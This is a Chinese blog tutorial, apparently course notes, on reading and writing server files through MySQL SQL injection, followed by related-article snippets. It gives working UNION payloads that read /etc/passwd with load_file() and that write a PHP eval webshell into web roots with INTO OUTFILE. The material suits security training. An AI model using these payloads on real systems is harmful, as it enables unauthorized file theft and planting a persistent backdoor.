SQL注入-第五节读写文件

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量181 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/132734878
版权

文章目录

第四节SQL注入读写文件

  • 掌握SQL 注入读写文件的原理

  • 掌握SQL 注入读写文件的方法

4.1前提条件

4.1.1权限问题

当前(连接)数据库的用户具有文件读写权限。数据库的权限粒度,某个库中某个表某个用户是否有增删改查权限。

MySQL 数据库用户,例如root@localhost,由两部分组成:

  • 用户名

  • 地址

# root@localhost
and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost'

4.1.2文件路径

已知读写目标文件的绝对路径。

/var/www/
/var/www/html/
c:/phpstudy/www/
c:/xampp/htdocs/
...

4.1.3安全选项

MySQL 数据库有关于文件读写的安全选项secure_file_priv。

secure_file_priv 参数限制了mysqld(MySQL DBMS) 的导入导出操作,这个选项是不能利用SQL 语句修改,必须修改my.ini 配置文件,并重启mysql 数据库。

show global variables like '%secure_file_priv%';

参数值说明

参数含义
secure_file_priv=NULL限制mysqld 不允许导入导出操作。
secure_file_priv=‘c:/a/’会限制mysqld 的导入导出操作在某个固定目录下;并且子目录有效。
secure_file_priv=不对mysqld 的导入导出操作做限制

4.2 读写文件

4.2.1读取文件

使用load_file() 函数。

and 1=2 union select 1,load_file("c:\\windows\\system32\\drivers\\etc\\hosts"),3
and 1=2 union select 1,load_file("c:/windows/system32/drivers/etc/hosts"),3
and 1=2 union select 1,load_file("/etc/passwd"),3

4.2.2写入文件

使用into outfile 语句。

and 1=2 union select 1,2,3 into outfile "c:/phpstudy_2016/www/1.php" 
and 1=2 union select 1,"<?php @eval($_REQUEST[777]);phpinfo()?>",3 into outfile "c:/phpstudy_2016/www/2.php"
and 1=2 union select 1,"<?php @eval($_REQUEST[777]);phpinfo()?>",3 into outfile "/var/www/html/1.php"
and 1=2 union select 1,"<?php @eval($_REQUEST[777]);phpinfo()?>",3 into outfile "/tmp/1.php"

Linux 系统下,一般情况下权限较低,无法写入文件。

§666§
关注
SQL 注入读写文件
Cwillchris的博客
06-04 831
SQL读写文件原理超详细讲解
SQL注入读写文件
weixin_43765321的博客
03-02 3678
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1051
就是利用文件读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
SQL注入中的文件读写操作:技术解析与防范策略
weixin_43822401的博客
05-24 544
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些高级的SQL注入攻击中,攻击者不仅能获取数据,还能读取和写入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,读取或写入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
SQL注入-文件读写文件的读取+写入:函数、使用方法
05-30 9347
SQL注入文件读写
网络安全--SQL注入读写文件
weixin_43774199的博客
09-24 709
课程任务:讲解MySQL读写文件的条件,教会学生配置MySQL的导入导出功能和用户权限的修改。组织实验使学生掌握load_file()、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 任务目标:了解MySQL读写文件的条件,学会配置MySQL的导入导出功能和用户权限的修改,掌握load_file、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 A.读写文件的基本条件和使用 SQL注入文件读写 SQL注入有直接
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1264
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
sql注入-回显注入实例详解
CPriLuke的博客
06-26 1628
根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748 本章主要对说明的内容通过实战的方式进一步加深,实战环境 sqlilab,hackbar 1. 寻找注入点 通过注入单引号后,网站返回sql报错,确认存在SQL注入,且得知数据库的类型为MYSQL 2. 确定当前数据库的列数 通过order by进行试探得到,如下所示,当为order by 4返回数据报错 sql注入语句说明,后台的原始数据为: select *
sql注入-MySQL
2202_75361164的博客
04-07 1212
盲注点确认后,我们一般不会去手动尝试一个字节一个字节的跑出来,而是采用工具比如sqlmap或者一些脚本来辅助我们,毕竟是属于重复无意义的工工作,交给机器就好了语句和之前其他查询都是类似,唯一的区别,就是盲注变成了一位字符一位字符的判断,不像之前那样一次性全部获取数据。
SQL注入sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 866
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
sql 注入读写文件
yuan_boss的博客
08-24 778
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
SQL注入文件读写
MingShenfree的博客
10-27 341
当有显示列的时候,文件读可以利用union注入 当没有显示列,只能利用盲注进行数据读取 union注入读取文件(load_file()) //union注入读取 e:/3.txt 文件 http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,load_file("e:/3.txt")# //也可以把 e:/3.txt 转换成16进制 0x653a2f332e747874 http://127.0.0.1/sqli/Less-1/?id=-1'
SQL注入文件读写
永远是少年
06-27 2230
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
SQL注入篇——文件读写注入
爱国小白帽
02-10 4163
文件读写注入的原理 就是利用文件读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
sql注入之——读写文件,带外攻击
wsnbbz的博客
02-10 1577
1.开启读文件权限 在my.ini加上secure_file_priv= secure_file_priv=代表对文件读写没有限制 secure_file_priv=NULL代表不能进行文件读写 secure_file_priv=d:/…代表只能对改路径下文件进行读写 2.读文件: 函数: load_file(); 语句: ?id=-1 union select 1,load_file(“d:\...
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2175
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
sql注入之load_file()函数读取操作系统文件需要权限
m0_63436163的博客
01-25 792
程序需要通过系统API来获取文件读取权限,具体实现取决于操作系统的权限管理方式。在Linux中,可以使用chmod命令设置文件的读权限,但是如果程序运行的用户没有读取该文件的权限,则依然无法读取。load_file()函数的使用需要谨慎,因为一些恶意用户可能会利用该函数获取系统中的敏感文件,从而对系统进行攻击。在进行文件读取操作时,操作系统需要对读取该文件的程序进行权限验证。如果没有相应的权限,程序将无法读取文件,因此获取文件读取权限是进行文件读取操作的必要前提。因此,程序需要以有相应权限的用户身份运行。
MSSQL手工注入实战:SQL注入漏洞探索
本文主要探讨了SQL注入攻击中的MSSQL注入,特别是在Windows Server 2008 R2环境下使用IIS搭建的MSSQL-SQLi-Labs第一关的实战演练。作者以学习笔记的形式,详细介绍了如何识别和利用MSSQL注入漏洞。 一、MSSQL手工...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值